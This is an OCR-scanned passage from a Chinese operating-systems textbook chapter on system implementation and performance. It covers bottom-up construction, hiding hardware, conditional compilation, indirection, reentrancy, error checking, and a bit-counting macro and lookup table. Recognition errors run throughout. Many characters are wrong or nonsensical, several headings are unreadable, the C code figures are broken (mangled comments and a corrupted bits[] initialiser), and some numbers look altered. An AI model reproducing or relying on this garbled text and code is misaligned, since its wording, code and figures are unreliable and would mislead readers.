或 者 自 底 和 同上 地 实现 。 在 目 顶 向 下 的 实现 中 ， 实 现 者 以 系统 调用 处 理 程 
序 为 开端 ， 并 且 探 客 需 要 什么 机 制 和 数据 结构 来 文 持 它 们 。 接 着 编写 这 
些 过 程 等 ， 直 到 触及 硬件 。 








这 种 方法 的 问题 是 ， 由 于 只 有 顶层 过 程 可 用 ， 任 何事 情 都 难于 测 
试 。 出 于 这 样 的 原因 ， 许 多 开发 人 员 友 现实 际 上 自 确 铝 上 地 构建 系统 更 
加 可 行 。 这 一 方法 需要 首先 编写 隐藏 底层 便 件 的 代码 ， 特 别 是 图 11-6 中 
的 HAL。 中 断 处 理 程序 和 时 钟 驱动 程序 也 是 早期 就 需要 的 。 

















然后 ， 可 以 使 用 一 个 简单 的 调度 器 《例如 轮转 调度 ) 来 解决 多 道 程 
序 设计 问题 。 在 这 一 时 刻 ， 测 试 系统 以 了 解 它 是 否 能 够 正确 地 运行 多 个 
进程 应 该 是 可 能 的 。 如 果 运 转正 常 ， 此 时 可 以 开始 仔细 地 定义 贯穿 系统 
的 各 种 各 样 的 表格 和 数据 结构 ， 特 别 是 那些 用 于 进程 和 线程 管理 以 及 后 
面 内 存 管理 的 表格 与 数据 结构 。IO 和 文件 系统 在 最 初 可 以 等 一 等 ， 用 
于 测试 和 调试 目的 的 读 键 盘 与 写 屏幕 的 基本 方法 除外 。 在 东 些 情况 下 ， 
关键 的 低层 数据 结构 应 该 得 到 保护 ， 这 可 以 通过 只 允许 经 由 特定 的 访问 
过 程 来 访问 而 实现 一 一 实际 上 这 是 面 癌 对 象 的 程序 设计 思想 ， 不 论 采 用 
何 种 程序 设计 语言 。 当 较 低 的 层次 完成 时 ， 可 以 彻 拆 地 测试 它们 。 这 














样 ， 系 统 目 砌 同上 推进 ， 很 像 是 建筑 商 建造 高 层 办 公 楼 的 方式 。 


如 果 有 一 个 大 型 团队 可 用 ， 那 么 丛 代 的 方法 是 首先 做 出 整个 系统 的 
详细 设计 ， 然 后 分 配 不 同 的 小 组 编写 不 同 的 模块 。 每 个 小 组 独立 地 测试 
目 己 的 工作 。 当 所 有 的 部 分 都 准备 好 时 ， 可 以 将 它们 集成 起 来 并 加 以 测 
试 。 这 一 设计 方式 存在 的 问题 是 ， 如 果 最 初 没有 什么 可 以 运转 ， 可 能 难 
于 分 离 出 一 个 或 多 个 模块 是 否 工 作 不 正常 ， 或 者 一 个 小 组 是 否 误解 了 茶 

些 其 他 模块 应 该 做 的 事情 。 尽 管 如 此 ， 如 果 有 大 型 团 了 从， 还 是 经 常 使 用 
该 方法 使 程序 设计 工作 中 的 并 行程 度 最 大 化 。 


13.3.8 ”实用 技术 


我 们 刚刚 了 解 了 系统 设计 与 实现 的 茶 些 抽象 思想 ， 现 在 将 针对 系统 
实现 考察 一 些 有 用 的 具体 撤 术 。 这 方面 的 技术 很 多 ， 但 是 篇 幅 的 限制 使 
我 们 只 能 介绍 其 中 的 少数 技术 。 


1. 隐 藏 硬件 


许多 人 硬件 是 十 分 及 烦 的 ， 所 以 只 好 尽早 将 其 隐藏 起 来 《除非 它 要 展 
现 能 力 ， 而 大 多 数 硬 件 不 会 这 样 ) 。 某 些 非常 低层 的 细节 可 以 通过 如 图 
13-2 所 示 的 HAL 类 型 的 层次 得 到 隐藏 。 然 而 ， 许 多 硬件 细 市 不 能 以 这 样 
的 方式 来 隐藏 。 





值得 尽早 关注 的 一 件 事 情 是 如 何 处 理 中 断 。 中 断 使 得 程序 设计 令 人 
不 愉快 ， 但 是 操作 系统 必须 对 它们 进行 处 理 。 一 种 方法 是 立刻 将 中 断 转 
变 成 别 的 东西 ， 例 如 ， 每 个 中 断 都 可 以 转变 成 即时 弹出 的 线程 。 在 这 一 
时 刻 ， 我 们 处 理 的 是 线程 ， 而 不 是 中 断 。 








第 二 种 方法 是 将 每 个 中 断 转 换 成 在 一 个 互 斥 量 上 的 unlock 操 作 ， 该 
互 斥 量 对 应 正在 等 待 的 驱动 程序 。 于 是 ， 中 断 的 惟一 效果 就 是 导致 某 个 
线程 变 为 就 绪 。 





第 三 种 方法 是 将 一 个 中 断 转 换 成 发 送 给 某 个 线程 的 消息 。 低 层 代码 





只 是 构造 一 个 表明 中 断 来 自 何 处 的 消 轧 ， 将 其 排 入 队列 ， 并 且 调 用 调度 
器 以 〈 洪 在 地 ) 运行 处 理 程序 ， 而 处 理 程序 可 能 正在 阻 旱 等 待 该 消息 。 
所 有 这 些 技术 ， 以 及 其 他 类 似 的 技术 ， 都 试图 将 中 断 转 换 成 线程 同步 操 
作 。 让 每 个 中 断 由 一 个 适当 的 线程 在 适当 的 上 下 文中 处 理 ， 比 起 在 中 断 
碰巧 故 生 的 随意 上 下 文中 运行 处 理 程序 ， 前 者 要 更 加 容易 管理 。 当 然 ， 
这 必须 高 效率 地 进行 ， 而 在 操作 系统 内 部 深 处 ， 一 切 都 必须 高 效率 地 进 


/一 


介 。 





大 多 数 操作 系统 被 设计 成 运行 在 多 个 硬件 平台 上 。 这 些 平台 可 以 按 
照 CPU 心 户 、MMU、 字 长 、RAM 大 小 以 及 不 能 容易 地 由 HAL 或 等 价 物 
屏蔽 的 其 他 特性 来 区 分 。 尽 管 如 此 ， 人 们 高 度 期 望 拥有 单一 的 一 组 源 文 
件 用 来 生成 所 有 的 版 本 ， 否 则 ， 后 来 发 现 的 每 个 程序 错误 必须 在 多 个 源 
文件 中 修改 多 次 ， 从 而 有 源 文 件 逐 渐 玻 远 的 危险 。 


某 些 硬件 的 差异 ， 例 如 RAM 大 小 ， 可 以 通过 让 操作 系统 在 引导 的 
时 候 确定 其 取 值 并 且 保 存在 一 个 变量 中 来 处 理 。 内 存 分 配器 可 以 利用 
RAM 大 小 变量 来 确定 构造 多 大 的 数据 块 蝇 速 缓存 、 页 表 等 。 甚 至 静态 
的 表格 ， 如 进程 表 ， 也 可 以 基于 总 的 可 用 内 存 来 确定 大 小 。 





然而 ， 其 他 的 差异 ， 例 如 不 同 的 CPU 芯片 ， 束 不 能 让 单一 的 二 进 制 
代码 在 运行 的 时 候 确定 它 正 在 哪 一 个 CPU 上 运行 。 解 决 一 个 源 代码 多 个 
目标 机 的 问题 的 一 种 方法 是 使 用 条 件 编译 。 在 源 文 件 中 ， 定 义 了 一 定 的 
编译 时 标志 用 于 不 同 的 配置 ， 并 且 这 些 标志 用 来 将 独立 于 CPU、 字 长 、 





MMU 等 的 代码 用 括号 括 起 。 例 如 ， 设 想 一 个 操作 系统 运行 在 Pentium 和 
UltraSPARC 心 片上 ， 这 就 需要 不 同 的 初始 化 代码 。 可 以 像 图 13-6a 中 那 
样 编写 init 过 程 的 代码 。 根 据 CPU 的 取 值 ( 该 值 定义 在 头 文件 config.h 
中 ) ， 实 现 一 种 初始 化 或 其 他 的 初始 化 过 程 。 由 于 实际 的 三 进 制 代码 只 
包含 目标 机 所 需要 的 代码 ， 这 样 就 不 会 损失 效率 。 


#include "config.h" #include "config.h" 

init( ) #if (WORD_LENGTH == 32) 
{ typedef int Register; 

#if (CPU == PENTIUM) #endif 

/* ie Xb fe: Pentium Ay WJ 46 14*/ 


#endif #if (WORD _LENGTH == 64) 
typedef long Register; 
#if (CPU == ULTRASPARC) #endif 


庄 此 处 是 UltraSPARC 的 初始 化 */ 
#endif Register RO, R1, R2, R3; 


} 





a) b) 


图 13-6 人 依赖 CPU 的 条 件 编译 ; b) 依 赖 字 长 的 条 件 编译 


第 二 个 例子 ， 假 设 需要 一 个 数据 类 型 Register， 它 在 Pentium 上 是 32 
位 ， 在 UltraSPARC 上 是 64 位 。 这 可 以 由 图 13-6b 中 的 条 件 代码 来 处 理 
(假设 编译 器 产生 32 位 的 int 和 64 位 的 long〉。 一 旦 做 出 这 样 的 定义 可 
能 是 在 别 的 什么 地 方 的 头 文件 中 ) ， 程 序 员 就 可 以 只 需 声 明 变 量 为 
Register 类 型 并 且 确 信和 它们 将 具有 正确 的 长 度 。 





当然 ， 头 文件 config.h 必 须 正 确 地 定义 。 对 于 Pentium 处 理 器 ， 它 大 


概 是 这 样 的 : 








#define CPU PENTIUM 
#define WORD LENGTH 32 




















为 了 编译 针对 UltraSPARC 的 系统 ， 应 该 使 用 不 同 的 config.h， 其 中 
具有 针对 UltraSPARC 的 正确 取 值 ， 它 或 许 是 这 样 的 : 





#define CPU ULTRASPARC 
#define WORD LENGTH 64 











一 些 读者 可 能 奇怪 为 什么 CPU 和 WORD _ LENGTH 用 不 同 的 宏 来 处 
理 。 我 们 可 以 很 容易 地 用 针对 CPU 的 测试 而 将 Register 的 定义 用 括号 括 
起 ， 对 于 Pentium 将 其 设置 为 32 位 ， 对 于 UltraSPARC 将 其 设置 为 64 位 。 
然而 ， 这 并 不 是 一 个 好 主意 。 考 虑 一 下 以 后 当 我 们 将 系统 移植 到 64 位 
Intel Itanium 处 理 器 时 会 发 生 什么 事情 。 我 们 可 能 不 得 不 为 了 Itanium 而 
在 图 13-6b 中 添加 第 三 个 条 件 。 通 过 像 上 面 那 样 定义 宏 ， 我 们 要 做 的 全 
部 事情 是 在 config.h 文 件 中 为 Itanium 处 理 器 包含 如 下 的 代码 行 : 











#define WORD LENGTH 64 








这 个 例子 例证 了 前 面 讨论 过 的 正 交 性 原则 。 那 些 依赖 CPU 的 细节 应 
该 基于 CPU 宏 而 条 件 编译 ， 而 那些 依赖 字 长 的 细节 则 应 该 使 用 
WORD_LENGTH 宏 。 类 似 的 考虑 对 于 许多 其 他 参数 也 是 适用 的 。 


2. 间 接 





人 们 不 时 地 说 在 计算 机 科学 中 没有 什么 问题 不 能 通过 另 一 个 层次 间 
接 得 到 解决 。 虽 然 有 些 夸大 其 词 ， 但 是 其 中 的 确 存在 一 定 程度 的 真实 
性 。 让 我 们 考虑 一 些 例子 。 在 基于 Pentium 的 系统 上 ， 当 一 个 键 被 按 下 
时 ， 硬 件 将 生成 一 个 中 断 并 且 将 键 的 编号 而 不 是 ASCI 字 符 编码 送 到 一 
个 设备 寄存 器 中 。 此 外 ， 当 此 键 后 来 被 释放 时 ， 第 二 个 中 断 生 成 ， 同 样 
伴随 一 个 键 编号 。 间 接 为 操作 系统 使 用 键 编导 作为 索引 检索 一 张 表 格 以 
获取 ASCII 字 符 提 供 了 可 能 ， 这 使 得 处 理 世 界 上 不 同 国家 使 用 的 许多 键 
盘 十 分 容易 。 获 得 按 下 与 释放 两 个 信息 使 得 将 任何 键 作为 换 档 键 成 为 可 

， 因 为 操作 系统 知道 键 按 下 与 释放 的 准确 序列 。 














间接 还 被 用 在 输出 上 。 程 序 可 以 写 ASCII 字 符 到 屏幕 上 ， 但 是 这 些 
字符 被 解释 为 针对 当前 输出 字体 的 一 张 表格 的 索引 。 表 项 包含 字符 的 位 
图 。 这 一 间接 使 得 将 字符 与 字体 相 分 离 成 为 可 能 








间接 的 男 一 个 例子 是 UNIX 中 主 设备 写 的 使 用 。 在 内 核 内 部 ， 有 一 
张 表 格 以 块 设备 的 主 设备 写 作为 案 引 ， 还 有 男 一 张 表格 用 于 字符 设备 。 
当 一 个 进程 打开 一 个 特定 的 文件 (例如 /dev/hd0〉 时 ， 系 统 从 i 节点 提取 
出 类 型 ( 块 设备 或 字符 设备 ) 和 主 副 设备 写 ， 并 且 检 索 适 当 的 驱动 程 订 
表 以 找到 驱动 程序 。 这 一 间接 使 得 重新 配置 系统 十 分 容易 ， 因 为 程序 涉 
及 的 是 符号 化 的 设备 名 ， 而 不 是 实际 的 驱动 程序 名 。 








还 有 为 一 个 间接 的 例子 出 现在 消息 传递 的 系统 中 ， 该 系统 命名 一 个 
邮箱 而 不 是 一 个 进程 作为 消息 的 目的 地 。 通 过 间接 使 用 邮箱 《而 不 是 指 
定 一 个 进程 作为 目的 地 ) ， 能 够 获得 相当 可 观 的 灵活 性 〈 例 如 ， 让 一 位 
秘书 处 理 她 的 老板 的 消息 ) 。 


在 某 种 意义 上 ， 使 用 诸如 





#define PROC TABLE SIZE 256 





























的 宏 也 是 间接 的 一 种 形式 ， 因 为 程序 员 无 须知 道 表格 实际 有 多 大 就 
可 以 编写 代码 。 一 个 良好 的 习惯 是 为 所 有 的 常量 提供 符号 化 的 名 字 (有 
时 -1、0 和 1 除外 ) ， 并 且 将 它们 放 在 头 文 件 中 ， 同 时 提供 注释 解释 它们 
代表 什么 。 








3. 可 重用 性 





在 上 略微 不 同 的 上 下 文中 重用 相同 的 代码 通常 是 可 行 的 。 这 样 做 是 一 
个 很 好 的 想法 ， 因 为 它 减少 了 二 进 制 代码 的 大 小 并 且 意 味 厦 代码 只 需要 
调试 一 次 。 例 如 ， 假 设 用 位 图 来 跟 踩 磁 盘 上 的 空 亲 块 。 磁 盘 块 管理 可 以 
通过 提供 管理 位 图 的 过 程 aloc 和 free 得 到 处 理 。 








在 最 低 限 度 上 ， 过 程 应 该 对 任何 磁盘 起 作用 。 但 是 我 们 可 以 比 
这 更 进一步 。 相 同 的 过 程 还 可 以 用 于 管理 内 存 块 、 文 件 系统 块 蜗 速 缓存 
中 的 块 ， 以 及 i 节点 。 事 实 上 ， 它 们 可 以 用 来 分 配 与 回收 能 够 线性 编写 


的 任意 资源 。 


AHA 


BEATS HY 2 TUES TAY AIT PES RIE EARRA 
上 ， 总 是 存在 着 这 样 的 危险 : 当 一 个 CPU 执行 东 个 过 程 时 ， 另 一 个 CPU 
在 第 一 个 完成 之 前 也 开始 执行 它 。 在 这 种 情况 下 ， 不 同 CPU 上 的 两 个 
(或 多 个 ) 线程 可 能 在 同时 执行 相同 的 代码 。 这 种 情况 必须 通过 使 用 互 
斥 量 或 者 茶 些 其 他 保护 临界 区 的 方法 进行 处 理 。 








然而 ， 在 单 处 理 器 上 ， 问 题 也 是 存在 的 。 特 别 地 ， 大 多 数 操作 系统 
古 在 允许 中 断 的 情况 下 运行 的 。 否 则 ， 将 丢失 许多 中 断 并 且 使 系统 不 可 
靠 。 当 操作 系统 忙于 执行 某 个 过 程 P 时 ， 完 全 有 可 能 发 生 一 个 中 断 并 且 
中 断 处 理 程 序 也 调用 P。 如 果 了 的 数据 结构 在 中 断 发 生 的 时 刻 处 于 不 一 致 
的 状态 ， 中 断 处 理 程序 就 会 注意 到 它们 处 于 不 一 致 的 状态 并 且 失 败 。 








可 能 发 生 这 种 情况 的 一 个 显而易见 的 例子 是 P 是 调度 器 。 假 设 茶 个 
进程 用 完了 它 的 时 间 配 额 ， 并 且 操 作 系统 正 将 其 移动 到 其 队列 的 末尾 。 
在 列表 处 理 的 半路 ， 中 断 发 生 了 ， 使 得 茶 个 进程 就 绪 ， 并 且 运 行 调 度 
器 。 由 于 队列 处 于 不 一 致 的 状态 ， 系 统 有 可 能 会 月 湿 。 因 此 ， 即 使 在 单 
处 理 嚣 上， 最 好 是 操作 系统 的 大 部 分 为 可 重 入 的 ， 关 键 的 数据 结构 用 互 
斥 量 来 保护 ， 并 且 在 中 断 不 被 允许 的 时 刻 茶 用 中 新。 


5.28 VE 








使 用 蛮 力 法 解决 问题 多 年 以 来 获得 了 较 差 的 名 声 ， 但 是 依据 简单 性 
它 经 毅 是 行 之 有 效 的 方法 。 每 个 操作 系统 都 有 许多 很 少 会 调用 的 过 程 或 
是 具有 很 少数 据 的 操作 ， 不 值得 对 它们 进行 优化 。 例 如 ， 在 系统 内 部 经 
常 有 必要 搜索 各 种 表格 和 数组 。 蛋 力 算法 只 是 让 表格 保持 表 项 建立 时 的 
顺序 ， 并 且 当 必须 查找 某 个 东西 时 线性 地 搜索 表格 。 如 果 表 项 的 数目 很 
少 〈《 例 如 少 于 1000 个 ) ， 对 表格 排序 或 建立 散 列 表 的 好 处 不 大 ， 但 是 代 
码 却 复杂 得 多 并 且 很 有 可 能 在 其 中 存在 错误 。 











当然 ， 对 处 于 关键 路 径 上 的 功能 ， 例 如 上 下 文 切 换 ， 使 它们 加 快速 
度 的 一 切 措施 都 应 该 尽力 去 做 ， 即 使 可 能 要 用 汇编 语言 编写 它们 。 但 
是 ， 系 统 的 大 部 分 并 不 处 于 关键 路 径 上 。 例 如 ， 许 多 系统 调用 很 少 被 调 
用 。 如 果 每 隔 1 秒 有 一 个 fork 调 用 ， 并且 该 调用 花费 1 肥 秒 完成 ， 那 么 即 
便 将 其 优化 到 花费 0 秒 也 不 过 仅 有 0.1% 的 获 益 。 如 果 优 化 过 的 代码 更 加 
庞大 且 有 更 多 错误 ， 那 就 不 必 多 此 一 举 了 。 








6. 首 先 检查 错误 


由 于 各 种 各 样 的 原因 ， 许 多 系统 调用 可 能 潜在 地 会 失败 : 要 打开 的 
文件 属于 他 人 ; 因为 进程 表 满 而 创建 进程 失败 ; 或 者 因为 目标 进程 不 存 
在 而 使 信号 不 能 被 发 送 。 操 作 系统 在 执行 调用 之 前 必须 无 微 不 至 地 检查 


每 一 个 可 能 的 错误 。 





许多 系统 调用 还 需要 获得 资源 ， 例 如 进程 表 的 空位 、i 节 点 表 的 空 


位 或 文件 搬 述 符 。 一 般 性 的 建议 是 在 获得 资源 之 前 ， 首 先进 行 检查 以 了 
解 系统 调用 能 否 实 际 执行 ， 这 样 可 以 省 去 许多 麻烦 。 这 意味 着 ， 将 所 有 
的 测试 放 在 执行 系统 调用 的 过 程 的 开始 。 每 个 测试 应 该 具有 如 下 的 形 

式 : 


if (error condition)return (ERROR CODE); 














如 宁 调 用 通过 了 所 有 严格 的 测试 ， 那 么 就 可 以 肯定 它 将 会 取得 成 


功 。 在 这 一 时 刻 它 才 能 获得 资源 。 








如 果 将 获得 资源 的 测试 分 散 开 ， 那 么 束 意 味 着 如 采 在 这 一 过 程 中 某 
个 测试 失败 ， 到 这 一 时 刻 已 经 获得 的 所 有 资源 都 必须 归还 。 如 果 在 这 里 
发 生 了 一 个 错误 并 且 资 源 没 有 被 归还 ， 可 能 并 不 会 并 刻 及 生 破 坏 。 例 
如 ， 一 个 进程 表 项 可 能 只 是 变 得 永久 地 不 可 用 。 然 而 ， 随 独 时 间 的 流 
逝 ， 这 一 差错 可 能 会 触发 多 次 。 最 终 ， 大 多 数 或 全 部 进程 表 项 可 能 都 会 
变 得 不 可 用 ， 导 致 系统 以 一 种 极度 不 可 预料 且 难 以 调试 的 方式 崩 尝 。 





许多 系统 以 内 存 泄漏 的 形式 遭受 了 这 一 问题 的 侵害 。— 典 型 地 ， 程 序 
调用 malloc 分 配 了 空间 ， 但 是 以 后 态 记 了 调用 free 释 放 它 。 逐 潮 地 ， 所 
有 的 内 存 都 消失 了 ， 直 到 系统 重新 启动 。 








Engler A (2000) 推荐 了 一 种 有 趣 的 方法 在 编译 时 检查 茶 些 这 样 
的 错误 。 他 们 注意 到 程序 员 知 道 许 多 定式 而 编 诺 器 并 不 知道 ， 例 如 当 你 


锁定 一 个 互 斥 量 的 时 候 ， 所 有 在 锁定 操作 处 开始 的 路 径 都 必须 包含 一 个 
解除 锁定 的 操作 并 且 在 相同 的 互 斥 量 上 没有 更 多 的 锁定 。 他 们 设计 了 一 
种 方法 让 程序 员 将 这 一 事实 告诉 编 诺 器 ， 并 且 指 示 编 诺 喜 在 编译 时 检查 
所 有 路 径 以 发 现 对 定式 的 违犯 。 程 序 员 还 可 以 设 定 已 分 配 的 内 存 必须 在 
所 有 路 径 上 释放 ， 以 及 设 定 许多 其 他 的 条 件 。 





13.4 PERE 








所 有 事情 都 是 平等 的 ， 一 个 快速 的 操作 系统 比 一 个 慢 速 的 操作 系统 
好 。 然 而 ， 一 个 快速 而 不 可 靠 的 操作 系统 还 不 如 一 个 慢 速 但 可 徘 的 操作 
系统 。 由 于 复杂 的 优化 经 常会 导致 程序 错误 ， 有 节制 地 使 用 它们 是 很 重 
要 的 。 尽 管 如 此 ， 在 性 能 是 至 关 重 要 的 地 方 进行 优化 还 是 值得 的 。 在 下 
面 儿 市 我 们 将 看 一 些 一 般 的 技术， 这 些 技术 在 特定 的 地 方 可 以 用 来 改进 
性 能 。 


13.4.1 操作 系统 为 什么 运行 缓慢 





在 讨论 优化 技术 之 前 ， 值 得 指出 的 是 许多 操作 系统 运行 缓慢 在 很 大 
程度 上 是 操作 系统 自身 造成 的 。 例 如 ， 古 老 的 操作 系统 ， 如 MS-DOS 和 
UNIX 版 本 7 在 几 秒 钟 内 就 可 以 启动 。 现 代 UNIX 系 统 和 Windows Vista 尽 
管 运行 在 快 1000 倍 的 硬件 上 ， 可 能 要 花费 几 分 钟 才能 启动 。 原 因 是 它们 
要 做 更 多 的 事情 ， 有 用 的 或 无 用 的 。 看 一 个 相关 的 案例 。 即 插 即 用 使 得 
安装 一 个 新 的 硬件 设备 相当 容易 ， 但 是 付出 的 代价 是 在 每 次 启动 时 ， 操 
作 系 统 都 必须 要 检查 所 有 的 硬件 以 了 解 是 否 存在 新 的 设备 。 这 一 总 线 扫 
描 是 要 花 时 间 的 。 

















一 种 蔡 代 的 (并 且 依 作者 看 来 是 更 好 的 ) 方法 是 完全 抛弃 即 插 即 


用 ， 并 且 在 屏幕 上 包含 一 个 图 标 标 明 “ 安 装 新 硬件 ”。 当 安装 一 个 新 的 便 
件 设备 时 ， 用 户 可 以 点 击 图 标 开始 总 线 扫描 ， 而 不 是 在 每 次 启动 的 时 候 
做 这 件 事 情 。 当 然 ， 当 今 的 系统 设计 人 员 是 完全 知道 这 一 选择 的 。 但 是 
他 们 拒绝 这 一 选择 ， 主 要 是 因为 他 们 假设 用 户 太 过 愚 罕 而 不 能 正确 地 做 
这 件 事 情 “ 尽 管 他 们 使 用 了 更 加 友好 的 措辞 ) 。 这 只 是 一 个 例子 ， 但 是 
还 存在 更 多 的 事例 ， 期 望 让 系统 “用 尸 友好 ”( 或 者 “ 防 傻瓜 *， 取 决 于 你 
的 看 法 ) 却 使 系统 始终 对 所 有 用 户 是 缓慢 的 。 














或 许 系统 设计 人 员 为 改进 性 能 可 以 做 的 最 大 的 一 件 事情 ， 是 对 于 添 
加 新 的 功能 特性 更 加 具有 选择 性 。 要 问 的 问题 不 是 “用 户 会 喜欢 吗 ? ”而 
是“ 这 一 功能 特性 按照 代码 大 小 、 速 度 、 复 杂 性 和 可 靠 性 值得 不 计 代价 
吗 ? ”只 有 当 优点 明显 地 超过 缺点 的 时 候 ， 它 才 应 该 被 包括 。 程 序 员 倾 
问 于 假设 代码 大 小 和 程序 错误 计数 为 0 并 且 速 度 为 无 穷 大 。 经 验 表 明 这 
种 观点 有 些 过 于 乐观 。 























另 一 个 重要 因素 是 产品 的 市 场 销售 。 到 茶 件 产品 的 第 4 或 第 5 版 上 市 
的 时 候 ， 真 正 有 用 的 所 有 功能 特性 或 许 已 经 全 部 包括 了 ， 并 且 需 要 该 产 
品 的 大 多 数 人 已 经 拥有 它 了 。 为 了 保持 销售 ， 许 多 生产 商 仍然 继续 生产 
新 的 版 本 ， 具 有 更 多 的 功能 特性 ， 正 是 这 样 才 可 以 同 现 有 的 顾客 出 售 升 
级 版 。 只 是 为 了 琴 加 新 的 功能 特性 而 添加 新 的 功能 特性 可 能 有 助 于 销 
售 ， 但 是 很 少 会 有 助 于 性 能 。 














13.4.2 ”什么 应 该 优化 


作为 一 般 的 规划， 系统 的 第 一 版 应 该 尽 可 能 简单 明了 。 惟 一 的 优化 
应 该 是 那些 显而易见 要 成 为 不 可 避免 的 问题 的 事情 。 为 文件 系统 提供 块 
高 速 缓存 就 是 这 样 的 一 个 例子 。 一 旦 系统 引导 起 来 并 运行 ， 就 应 该 仔细 
地 测量 以 了 解 时 间 真 正 花 在 了 什么 地 方 。 基 于 这 些 数字 ， 应 该 在 最 有 帮 
助 的 地 方 做 出 优化 。 

















这 里 有 一 个 关于 优化 不 但 不 好 反而 更 坏 的 真实 故事 。 作 者 的 一 名 学 
生 编写 了 MINIX 的 mkfs 程 序 。 该 程序 在 一 个 新 格式 化 的 磁盘 上 布下 一 个 
新 的 文件 系统 。 这 名 学 生花 了 大 约 6 个 月 的 时 间 对 其 进行 优化 ， 包 括 放 
入 磁盘 高 速 缓存 。 当 他 上 交 该 程序 时 ， 它 不 能 工作 ， 需 要 另外 几 个 月 进 
行 调 试 。 在 计算 机 的 生命 周期 中 ， 当 系统 安装 时 ， 该 程序 典型 地 在 便 盘 
上 运行 一 次 。 它 还 对 每 块 做 格式 化 的 软盘 运行 一 次 。 每 次 运行 大 约 耗 时 
2 秒 。 即 使 未 优化 的 版 本 耗 时 1 分 钟 ， 人 花费 如 此 多 的 时 间 优 化 一 个 很 少 使 
用 的 程序 也 是 相当 不 值 的 。 











对 于 性 能 优化 ， 一 条 相当 适用 的 口号 是 : 


足够 好 就 够 好 了 。 


通过 这 条 口号 我 们 要 表达 的 意思 是 : 性 能 一 旦 达到 一 个 合理 的 水 


平 ， 榨 出 最 后 一 点 百分比 的 努力 和 复杂 性 或 许 并 不 值得 。 如 果 调 度 算法 
相当 公平 并 且 在 90% 的 时 间 保 持 CPU 忙 碌 ， 它 就 尽 到 了 自己 的 职责 。 发 
明 一 个 改进 了 59% 但 是 要 复杂 得 多 的 算法 或 许 是 一 个 坏 主意 。 类 似 地 ， 
如 果 缺 页 率 足 够 低 到 不 是 瓶颈 ， 殉 服 重 重 难 关 以 获得 优化 的 性 能 通 冲 并 
不 值得 。 避 免 灾 难 比 获得 优化 的 性 能 要 重要 得 多 ， 特 别 是 针对 一 种 负载 
的 优化 对 于 另 一 种 负载 可 能 并 非 优化 的 情况 。 











13.4.3 空间- 时间 的 权衡 





改进 性 能 的 一 种 一 般 性 的 方法 是 权衡 时 间 与 空间 。 在 一 个 使 用 很 少 
内 存 但 是 速度 比较 慢 的 算法 与 一 个 使 用 很 多 内 存 但 是 速度 更 快 的 算法 之 
间 进 行 选择 ， 这 在 计算 机 科学 中 是 经 常 发 生 的 事情 。 在 做 出 重要 的 优化 
时 ， 值 得 寻找 通过 使 用 更 多 内 存 加 快 了 速度 的 算法 ， 或 者 反 过 来 通过 做 
更 多 的 计算 市 省 了 宝贵 的 内 存 的 算法 。 

















一 种 常用 而 有 益 的 技术 是 用 宏 来 代 珍 小 的 过 程 。 使 用 宏 消 除了 通常 
与 过 程 调用 相关 联 的 开销 。 如 果 调 用 出 现在 一 个 循环 的 内 部 ， 这 种 获 益 
尤其 显著 。 例 如 ， 假 设 我 们 使 用 位 图 来 跟 踊 资源， 并 且 经 第 需要 了 解 在 
位 图 的 茶 一 部 分 中 有 多 少 个 单元 是 空闲 的 。 为 此 ， 我 们 需要 一 个 过 程 

bit_count 来 计数 一 个 字 市 中 值 为 1 的 位 的 个 数 。 图 13-7a 中 给 出 了 简单 明 
了 的 过 程 。 它 对 一 个 字 节 中 的 各 个 位 循环 ， 每 次 计数 它们 一 次 。 





#define BYTE_SIZE 8 /一 个 字 节 包含 8 个 位 */ 


int bit_count(int byte) ; 
1 对 一 个 字 节 中 的 位 进行 计数 */ 
int i, count = 0; 
for (i = 0; i < BYTE_SIZE; i++) /# 对 一 个 字 节 中 的 各 个 位 循环 */ 
if ((byte >> i) & 1) count++; * 如 果 该 位 是 1， 计 数 加 1 */ 
return(count); /* 返回 和 */ 


记 将 一 个 字 节 中 的 位 相 加 并 且 返 回 和 的 宏 */ 
#define bit_count(b)((b&1) + ((b>>1)&1) + ((b>>2)&1) + ((b>>3)&1) + \ 
((b>>4)&1) + ((b>>5)&1) + ((b>>6)&1) + ((b>>7)&1)) 


此 在 一 个 表 中 查找 位 计数 的 宏 */ 
char bits[256] =:{0, 1, 1,2, 1,:2,.2,'3,'1,2,2,.3,2; 3, 3, 4, 1223,23, 3} 
#define bit_count(b) (int) bits[b] 





c) 
图 13-7 人 对 一 个 字 节 中 的 位 进行 计数 的 过 程 ; b) 对 位 进行 计数 的 
E, 9 在 表 中 查找 位 计数 
该 过 程 有 两 个 低 效 的 根源 。 首 先 ， 它 必须 被 调用 ， 必 须 为 它 分 配 栈 
空间 ， 并 有 旦 必须 返回 。 每 个 过 程 调 用 都 有 这 个 开销 。 第 二 ， 它 包含 一 个 
循环 ， 并 且 总 是 存在 与 循环 相关 联 的 某 些 开销 。 





一 种 完全 不 同 的 方法 是 使 用 图 13-7b 中 的 宏 。 这 个 宏 是 一 个 内 联 表 
达 式 ， 它 通过 对 参数 连续 地 移 位 ， 屏 蔽 除 低位 以 外 的 其 他 位 ， 并 且 将 8 
个 项 相 加 ， 这 样 来 计算 位 的 和 。 这 个 宏 决 不 是 一 件 艺术 作品 ， 但 是 它 只 
在 代码 中 出 现 一 次 。 当 这 个 宏 被 调用 时 ， 例 如 通过 





sum=bit _ count (table[i]); 





这 个 宏 调 用 看 起 来 与 过 程 调用 等 同 。 因 此 ， 除 了 定义 有 一 点 次 乱 以 
外 ， 宏 中 的 代码 看 上 去 并 不 比 过 程 中 的 代码 要 差 ， 但 是 它 的 效率 更 高 ， 
因为 它 消除 了 过 程 调 用 的 开销 和 循环 的 开销 。 





我 们 可 以 更 进一步 研究 这 个 例子 。 究 竟 为 什么 计算 位 计数 ? 为 什么 
不 在 一 个 表 中 碍 找 ? 毕竟 只 有 256 个 不 同 的 字 节 ， 每 个 字 节 具 有 0 到 8 之 
间 的 惟一 的 值 。 我 们 可 以 声明 一 个 256 项 的 表 bits， 每 一 项 〈 在 编译 时 ) 
初始 化 成 对 应 于 该 字 节 值 的 位 计数 。 采 用 这 一 方法 在 运行 时 根本 就 不 需 
要 计算 ， 只 要 一 个 变 址 操作 就 可 以 了 。 图 13-7c 中 给 出 了 做 这 一 工作 的 


ez 
TEx o 














这 是 用 内 存 换取 计算 时 间 的 明显 的 例子 。 然 而 ， 我 们 还 可 以 再 进 一 
步 。 如 果 需 要 整个 32 位 字 的 位 计数 ， 使 用 我 们 的 bit_count 宏 ， 每 个 字 我 
们 需要 执行 四 次 查找 。 如 宋 将 表 扩 展 到 65 536 项 ， 每 个 字 奉 找 两 次 就 足 
够 了 ， 代 价 是 更 大 的 表 。 





